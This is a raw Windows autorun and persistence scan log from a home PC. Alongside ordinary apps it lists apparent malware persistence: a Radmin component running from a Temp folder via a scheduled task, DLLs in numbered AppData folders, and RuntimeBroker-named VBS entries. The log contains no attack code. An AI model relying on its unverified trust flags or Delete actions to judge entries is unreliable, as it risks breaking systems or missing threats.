C:\Windows\System32\fxsevent.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft Fax, EventMessageFile
C:\Windows\System32\fxsevent.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft Fax, CategoryMessageFile
C:\WINDOWS\system32\perfctrs.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft-Windows-PerfCtrs, EventMessageFile
C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_3c2bd4a1ec6d228e\nvoglv64.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\NVIDIA OpenGL Driver, EventMessageFile
C:\Program Files (x86)\Steam\bin\steamservice.exe 2600.35 kb, rsAh, created: 21.05.2018 19:39:38, modified: 21.07.2023 14:04:18 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Steam Client Service, EventMessageFile
C:\d3e0cf5d05ea7db318e90ab5\DW\DW20.exe error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\VSSetup, EventMessageFile
v4.0.30319\EventLogMessages.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\VSTTAgentProcess, EventMessageFile
C:\WINDOWS\system32\eventlog.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\VSTTExecution, EventMessageFile
%13%\ax88179_178a.sys error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\AX88179, EventMessageFile
%13%\ax88179x_178a_772d.sys error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\AX88179A, EventMessageFile
C:\WINDOWS\System32\DriverStore\FileRepository\e1d68x64.inf_amd64_b44028fc7fdf4fca\e1dmsg.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\e1dexpress, EventMessageFile
C:\WINDOWS\System32\drivers\iaStorAV.sys error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\iaStorAV, EventMessageFile
%13%\ibtusb.sys error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\ibtusb, EventMessageFile
C:\WINDOWS\system32\drivers\iaLPSS2_GPIO2_CNL.sys error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Intel-iaLPSS2-GPIO2, EventMessageFile
C:\WINDOWS\System32\irmon.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\irevents, EventMessageFile
C:\WINDOWS\System32\irmon.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\irevents, CategoryMessageFile
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\msedge.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft Edge Etw, EventMessageFile
C:\WINDOWS\system32\drivers\nvdimmn.sys error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-NvdimmN, EventMessageFile
C:\WINDOWS\System32\Drivers\UMDF\UsbccidDriver.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-USB-CCID, EventMessageFile
C:\WINDOWS\UUS\x86\wuauengcore.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-WindowsUpdateClient, EventMessageFile
C:\WINDOWS\System32\drivers\nvdimmn.sys error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\nvdimmn, EventMessageFile
C:\WINDOWS\System32\RstMwEventLogMsg.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\RST Middleware, EventMessageFile
C:\WINDOWS\System32\Drivers\uefi.sys error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\UEFI, EventMessageFile
C:\WINDOWS\System32\drivers\xvdd.sys error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Xvdd, EventMessageFile
C:\Users\Isaac\AppData\Local\Temp\fd369298e4\jweupdater.exe 833132.36 kb, rsah, created: 05.03.2023 23:23:54, modified: 05.03.2023 23:21:53 Script: Quarantine, Delete, Delete via BC	x64	File in Startup folder	C:\Users\Isaac\AppData\Local\Temp\fd369298e4\, C:\Users\Isaac\AppData\Local\Temp\fd369298e4\jweupdater.exe,
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC	x64	Shortcut in Startup folder	C:\Users\Isaac\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\Isaac\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk,
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe 3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56 Script: Quarantine, Delete, Delete via BC	x64	Shortcut in Startup folder	C:\Users\Isaac\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\Isaac\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk,
C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe 4765.48 kb, rsAh, created: 25.10.2020 18:19:48, modified: 29.10.2020 17:24:00 Script: Quarantine, Delete, Delete via BC	x64	Shortcut in Startup folder	C:\Users\Isaac\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\Isaac\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Voicemod.lnk,
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe 731.08 kb, rsAh, created: 14.06.2023 14:38:30, modified: 14.06.2023 14:38:30 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_LOCAL_MACHINE, Software\Microsoft\Windows\CurrentVersion\Run, SunJavaUpdateSched Delete
C:\Program Files (x86)\Steam\steam.exe 4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Steam Delete
C:\Program Files\NZXT CAM\NZXT error getting file info Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, NZXT.CAM Delete
CAM.exe error getting file info Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, NZXT.CAM Delete
Discord.exe error getting file info Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Discord Delete
C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe 31986.45 kb, rsAh, created: 06.05.2020 00:58:34, modified: 10.01.2023 22:46:52 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, EpicGamesLauncher Delete
C:\Users\Isaac\AppData\Local\Microsoft\OneDrive\OneDrive.exe 2546.42 kb, rsAh, created: 22.04.2020 08:12:15, modified: 22.07.2023 00:30:13 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, OneDrive Delete
C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALauncher.exe 2610.10 kb, rsAh, created: 15.07.2023 00:27:26, modified: 15.07.2023 00:27:26 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, EADM Delete
C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe 1744.01 kb, rsAh, created: 16.07.2023 07:09:04, modified: 16.07.2023 07:09:04 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Overwolf Delete
C:\Users\Isaac\AppData\Roaming\uTorrent Web\utweb.exe 6264.66 kb, rsAh, created: 16.11.2022 17:57:48, modified: 16.11.2022 17:57:48 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, utweb Delete
C:\Riot Games\Riot Client\RiotClientServices.exe 69080.41 kb, rsAh, created: 22.04.2020 01:23:26, modified: 21.07.2023 01:52:34 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RiotClient Delete
C:\Users\Isaac\AppData\Roaming\1000071060\rwfacade.dll 1302.60 kb, rsAh, created: 05.03.2023 23:25:56, modified: 05.03.2023 23:25:57 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, rwfacade.dll Delete
C:\Users\Isaac\AppData\Roaming\1000072060\rlmp32wlve.dll 1190.61 kb, rsAh, created: 05.03.2023 23:25:57, modified: 05.03.2023 23:25:58 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, rlmp32wlve.dll Delete
C:\Users\Isaac\AppData\Roaming\1000079060\rlmp32wce.dll 14310.47 kb, rsAh, created: 19.03.2023 20:54:11, modified: 19.03.2023 20:57:05 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, rlmp32wce.dll Delete
C:\Users\Isaac\AppData\Roaming\NTSystem\ntlhost.exe 794610.50 kb, rsAh, created: 01.04.2023 12:36:36, modified: 01.04.2023 12:36:37 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, NTSystem Delete
C:\Users\Isaac\AppData\Roaming\1000107060\ntredirect.dll 19455.50 kb, rsAh, created: 02.04.2023 17:53:25, modified: 02.04.2023 17:58:52 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, ntredirect.dll Delete
C:\Users\Isaac\AppData\Roaming\tMaIE.vbs 0.13 kb, rsAh, created: 11.04.2023 21:19:38, modified: 11.04.2023 21:19:38 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RuntimeBroker_tMaIE Delete
C:\Users\Isaac\AppData\Roaming\xtuvv.vbs 0.13 kb, rsAh, created: 28.04.2023 21:58:57, modified: 28.04.2023 21:58:57 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RuntimeBroker_xtuvv Delete
C:\Users\Isaac\AppData\Roaming\GmfIK.vbs 0.13 kb, rsAh, created: 28.04.2023 21:58:58, modified: 28.04.2023 21:58:58 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RuntimeBroker_GmfIK Delete
C:\Users\Isaac\AppData\Local\Grammarly\DesktopIntegrations\Grammarly.Desktop.exe 741.42 kb, rsAh, created: 26.05.2023 06:56:58, modified: 26.05.2023 06:56:58 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Grammarly Delete
C:\Users\Isaac\AppData\Roaming\1000219050\unsecapp.exe 150.51 kb, rsAh, created: 29.05.2023 15:53:02, modified: 29.05.2023 15:53:03 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, unsecapp.exe Delete
C:\Program Files\LGHUB\lghub.exe 148462.75 kb, rsAh, created: 23.06.2023 12:22:48, modified: 23.06.2023 12:22:46 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, LGHUB Delete
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe 3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56 Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, MicrosoftEdgeAutoLaunch_E61B34E8EC343F2555F1806FED7939D1 Delete
C:\WINDOWS\system32\bootim.exe error getting file info Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_LOCAL_MACHINE, System\CurrentControlSet\Control\Session Manager\, BootShell
C:\WINDOWS\System32\win32k.sys error getting file info Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_LOCAL_MACHINE, System\CurrentControlSet\Control\Session Manager\SubSystems, Kmode
C:\WINDOWS\system32\vp6vfw.dll error getting file info Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_LOCAL_MACHINE, Software\Microsoft\Windows NT\CurrentVersion\Drivers32, vidc.VP60 Delete
C:\WINDOWS\system32\vp6vfw.dll error getting file info Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_LOCAL_MACHINE, Software\Microsoft\Windows NT\CurrentVersion\Drivers32, vidc.VP61 Delete
C:\Windows\System32\OneDriveSetup.exe error getting file info Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_USERS, S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run, OneDriveSetup Delete
C:\Windows\System32\OneDriveSetup.exe error getting file info Script: Quarantine, Delete, Delete via BC	x32	Registry key	HKEY_USERS, S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run, OneDriveSetup Delete
C:\Program Files\Riot Vanguard\vgtray.exe 3016.35 kb, rsAh, created: 12.08.2020 12:52:11, modified: 19.06.2023 10:53:39 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, Software\Microsoft\Windows\CurrentVersion\Run, Riot Vanguard Delete
C:\Program Files (x86)\Steam\steam.exe 4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Steam Delete
C:\Program Files\NZXT CAM\NZXT error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, NZXT.CAM Delete
CAM.exe error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, NZXT.CAM Delete
Discord.exe error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Discord Delete
C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe 31986.45 kb, rsAh, created: 06.05.2020 00:58:34, modified: 10.01.2023 22:46:52 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, EpicGamesLauncher Delete
C:\Users\Isaac\AppData\Local\Microsoft\OneDrive\OneDrive.exe 2546.42 kb, rsAh, created: 22.04.2020 08:12:15, modified: 22.07.2023 00:30:13 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, OneDrive Delete
C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALauncher.exe 2610.10 kb, rsAh, created: 15.07.2023 00:27:26, modified: 15.07.2023 00:27:26 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, EADM Delete
C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe 1744.01 kb, rsAh, created: 16.07.2023 07:09:04, modified: 16.07.2023 07:09:04 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Overwolf Delete
C:\Users\Isaac\AppData\Roaming\uTorrent Web\utweb.exe 6264.66 kb, rsAh, created: 16.11.2022 17:57:48, modified: 16.11.2022 17:57:48 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, utweb Delete
C:\Riot Games\Riot Client\RiotClientServices.exe 69080.41 kb, rsAh, created: 22.04.2020 01:23:26, modified: 21.07.2023 01:52:34 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RiotClient Delete
C:\Users\Isaac\AppData\Roaming\1000071060\rwfacade.dll 1302.60 kb, rsAh, created: 05.03.2023 23:25:56, modified: 05.03.2023 23:25:57 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, rwfacade.dll Delete
C:\Users\Isaac\AppData\Roaming\1000072060\rlmp32wlve.dll 1190.61 kb, rsAh, created: 05.03.2023 23:25:57, modified: 05.03.2023 23:25:58 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, rlmp32wlve.dll Delete
C:\Users\Isaac\AppData\Roaming\1000079060\rlmp32wce.dll 14310.47 kb, rsAh, created: 19.03.2023 20:54:11, modified: 19.03.2023 20:57:05 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, rlmp32wce.dll Delete
C:\Users\Isaac\AppData\Roaming\NTSystem\ntlhost.exe 794610.50 kb, rsAh, created: 01.04.2023 12:36:36, modified: 01.04.2023 12:36:37 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, NTSystem Delete
C:\Users\Isaac\AppData\Roaming\1000107060\ntredirect.dll 19455.50 kb, rsAh, created: 02.04.2023 17:53:25, modified: 02.04.2023 17:58:52 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, ntredirect.dll Delete
C:\Users\Isaac\AppData\Roaming\tMaIE.vbs 0.13 kb, rsAh, created: 11.04.2023 21:19:38, modified: 11.04.2023 21:19:38 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RuntimeBroker_tMaIE Delete
C:\Users\Isaac\AppData\Roaming\xtuvv.vbs 0.13 kb, rsAh, created: 28.04.2023 21:58:57, modified: 28.04.2023 21:58:57 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RuntimeBroker_xtuvv Delete
C:\Users\Isaac\AppData\Roaming\GmfIK.vbs 0.13 kb, rsAh, created: 28.04.2023 21:58:58, modified: 28.04.2023 21:58:58 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RuntimeBroker_GmfIK Delete
C:\Users\Isaac\AppData\Local\Grammarly\DesktopIntegrations\Grammarly.Desktop.exe 741.42 kb, rsAh, created: 26.05.2023 06:56:58, modified: 26.05.2023 06:56:58 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Grammarly Delete
C:\Users\Isaac\AppData\Roaming\1000219050\unsecapp.exe 150.51 kb, rsAh, created: 29.05.2023 15:53:02, modified: 29.05.2023 15:53:03 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, unsecapp.exe Delete
C:\Program Files\LGHUB\lghub.exe 148462.75 kb, rsAh, created: 23.06.2023 12:22:48, modified: 23.06.2023 12:22:46 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, LGHUB Delete
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe 3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, MicrosoftEdgeAutoLaunch_E61B34E8EC343F2555F1806FED7939D1 Delete
C:\PROGRA~1\VIRTUA~2\VIRTUA~4.DLL 131.71 kb, rsAh, created: 03.12.2022 11:14:42, modified: 03.12.2022 11:14:42 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, Software\Microsoft\Windows NT\CurrentVersion\Windows, AppInit_DLLs
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved, {05B38830-F4E9-4329-978B-1DD28605D202} Delete
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved, {056D528D-CE28-4194-9BA3-BA2E9197FF8C} Delete
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved, {0596C850-7BDD-4C9D-AFDF-873BE6890637} Delete
Items found - 1191, recognized as trusted - 1094

Internet Explorer extension modules (BHOs, Toolbars ...)

File name	Redirector	Type	Description	Manufacturer	CLSID
C:\Program Files (x86)\Microsoft\Edge\Application\115.0.1901.183\BHO\ie_to_edge_bho.dll 445.44 kb, rsAh, created: 23.07.2023 03:50:03, modified: 21.07.2023 02:01:11 Script: Quarantine, Delete, Delete via BC	x32	BHO	IEToEdge BHO	Copyright Microsoft Corporation. All rights reserved.	{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} Delete
C:\Program Files (x86)\Microsoft\Edge\Application\115.0.1901.183\BHO\ie_to_edge_bho_64.dll 573.94 kb, rsAh, created: 23.07.2023 03:50:03, modified: 21.07.2023 02:01:25 Script: Quarantine, Delete, Delete via BC	x64	BHO	IEToEdge BHO	Copyright Microsoft Corporation. All rights reserved.	{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} Delete
C:\Program Files\Java\jre-1.8\bin\ssv.dll 726.63 kb, rsAh, created: 14.06.2023 14:21:28, modified: 14.06.2023 14:21:28 Script: Quarantine, Delete, Delete via BC	x64	BHO	Java(TM) Platform SE binary	Copyright © 2023	{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} Delete
C:\Program Files\Java\jre-1.8\bin\jp2ssv.dll 357.63 kb, rsAh, created: 14.06.2023 14:20:16, modified: 14.06.2023 14:20:16 Script: Quarantine, Delete, Delete via BC	x64	BHO	Java(TM) Platform SE binary	Copyright © 2023	{DBC80044-A445-435b-BC74-9C25C1C588A9} Delete
Items found - 8, recognized as trusted - 4

Windows Explorer extension modules

File name	Redirector	Destination	Description	Manufacturer	CLSID
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	MEGA (Synced)			{05B38830-F4E9-4329-978B-1DD28605D202} Delete
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	MEGA (Pending)			{056D528D-CE28-4194-9BA3-BA2E9197FF8C} Delete
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	MEGA (Syncing)			{0596C850-7BDD-4C9D-AFDF-873BE6890637} Delete
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	MEGA (Synced)			{05B38830-F4E9-4329-978B-1DD28605D202} Delete
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	MEGA (Pending)			{056D528D-CE28-4194-9BA3-BA2E9197FF8C} Delete
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	MEGA (Syncing)			{0596C850-7BDD-4C9D-AFDF-873BE6890637} Delete
Items found - 90, recognized as trusted - 84

Printing system extensions (print monitors, providers)

File name	Redirector	Name	Type	Description	Manufacturer
Items found - 7, recognized as trusted - 7

Task Scheduler jobs

File name	Redirector	Job name	Description	Manufacturer	Path	Command line
C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe 100.00 kb, rsAh, created: 29.09.2020 19:53:40, modified: 29.09.2020 19:53:39 Script: Quarantine, Delete, Delete via BC	x64	bookingDesktopAppUpdateTaskMachineCore Script: Delete scheduler task	bookingDesktopApp Update	Copyright 2007-2010 Google Inc.	C:\WINDOWS\system32\Tasks\	C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe /c
C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe 100.00 kb, rsAh, created: 29.09.2020 19:53:40, modified: 29.09.2020 19:53:39 Script: Quarantine, Delete, Delete via BC	x64	bookingDesktopAppUpdateTaskMachineUA Script: Delete scheduler task	bookingDesktopApp Update	Copyright 2007-2010 Google Inc.	C:\WINDOWS\system32\Tasks\	C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe /ua /installsource scheduler
C:\Users\Isaac\AppData\Roaming\Google\Chrome\GoogleUpdateOnDemand.exe 19009.89 kb, rsAh, created: 06.04.2023 22:10:08, modified: 06.04.2023 22:10:08 Script: Quarantine, Delete, Delete via BC	x64	GoogleUpdateTaskMachineQC Script: Delete scheduler task	Google Update	Copyright 2018 Google LLC	C:\WINDOWS\system32\Tasks\	C:\Users\Isaac\AppData\Roaming\Google\Chrome\GoogleUpdateOnDemand.exe
C:\Users\Isaac\AppData\Local\Temp\fd369298e4\jweupdater.exe 833132.36 kb, rsah, created: 05.03.2023 23:23:54, modified: 05.03.2023 23:21:53 Script: Quarantine, Delete, Delete via BC	x64	jweupdater.exe Script: Delete scheduler task	Radmin component	Copyright © 1999-2017 Famatech Corp. and its licensors. All rights reserved.	C:\WINDOWS\system32\Tasks\	C:\Users\Isaac\AppData\Local\Temp\fd369298e4\jweupdater.exe
C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\LiquidSensord.exe 245.72 kb, rsAh, created: 03.11.2020 10:51:12, modified: 03.11.2020 10:51:12 Script: Quarantine, Delete, Delete via BC	x64	LiquidSensord Script: Delete scheduler task	LiquidSensord	Copyright © 2018 GIGA-BYTE TECHNOLOGY CO., LTD.	C:\WINDOWS\system32\Tasks\	"C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\LiquidSensord.exe"
C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe 71.46 kb, rsAh, created: 16.04.2023 00:49:32, modified: 16.04.2023 00:49:20 Script: Quarantine, Delete, Delete via BC	x64	BackgroundDownload Script: Delete scheduler task	Visual Studio Background Download	© Microsoft Corporation. All rights reserved.	C:\WINDOWS\system32\Tasks\Microsoft\VisualStudio\Updates\	C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe
